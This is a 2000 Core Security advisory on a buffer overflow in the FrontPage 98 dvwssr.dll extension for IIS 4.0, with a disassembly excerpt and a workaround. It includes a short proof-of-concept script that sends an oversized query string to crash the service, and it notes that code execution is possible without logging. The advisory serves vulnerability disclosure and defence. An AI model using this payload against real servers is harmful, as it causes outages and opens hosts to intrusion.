MS IIS FrontPage 98 Extensions Buffer Overflow Vulnerability

MS IIS FrontPage 98 Extensions Buffer Overflow Vulnerability

MS IIS FrontPage 98 Extensions Buffer Overflow Vulnerability

Date Published: 2000-04-14

Last Update: 2000-04-14

Advisory ID: CORE-041200

Bugtraq ID: 1109

CVE Name: CVE-2000-0260

Title: MS IIS FrontPage 98 Extensions Buffer Overflow Vulnerability

Class: Boundary Error Condition (Buffer Overflow)

Remotely Exploitable: Yes

Locally Exploitable: No

Release Mode: USER RELEASE

Vulnerability Description:
The dvwssr.dll included with the FrontPage 98 extensions for IIS and shipped as part of the NT Option Pack has a remotely exploitable buffer overflow. This attack will result in the service no longer accepting connections and may allow for remote code execution on the vulnerable host.

Vulnerable Packages:
. Microsoft FrontPage 98 Server Extensions for IIS
- Microsoft FrontPage 98
- Microsoft IIS 4.0
- Microsoft NT Option Pack for NT 4.0
. Microsoft InterDev 1.0
- Microsoft Windows NT 4.0

Solution/Vendor Information/Workaround:
Workaround: Delete DVWSSR.DLL (this may break InterDev).

This vulnerability was found by Gerardo Richarte and Alberto SoliƱo from Core Security Technologies.

Technical Description - Exploit/Concept Code:
We have been playing with dvwssr.dll and we've found a buffer overflow that stops the server from incoming connections, at least.

The code where the buffer overflow resides is:

mov eax, [edi+TEXTENSION_CONTROL_BLOCK.lpszQueryString]
test eax, eax
jz _text_581813FD
push eax
lea eax, [esp+14h+queryStringCoph]
push eax
call ds:lstrcpyA ;see here MS ENGINEERS: BUFFER OVERFLOW
test eax, eax
jz _text_581813FD
lea eax, [esp+10h+queryStringCoph]
push eax
call unescape_url

So, below is an example of how to exploit this vulnerability:

Of course, having the source code makes it harder to find this types of bugs...

print "GET /_vti_bin/_vti_aut/dvwssr.dll?";
print "a" x 5000;
print " HTTP/1.1
Host: yourhost


We've been playing a little more trying to exploit this buffer overflow, and as we don't have InterDevs installed on our IIS, we copied the .dll to /msadc directory, and with this configuration, we have been able to make the code jump to our buffer.

Under these circunstances, the actual BO allows to execute arbitrary code in the target machine. It's interesting to note that no log is generated as effect of this attack.

About Core Security Technologies
Core Security Technologies develops strategic security solutions for Fortune 1000 corporations, government agencies and military organizations. The company offers information security software and services designed to assess risk and protect and manage information assets.
Headquartered in Boston, MA, Core Security Technologies can be reached at 617-399-6980 or on the Web at

To learn more about CORE IMPACT, the first comprehensive penetration testing framework, visit:

The contents of this advisory are copyright (c) 2003 CORE Security Technologies and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.

$Id: iis4-advisory.txt,v 1.1 2003/04/15 16:06:11 carlos Exp $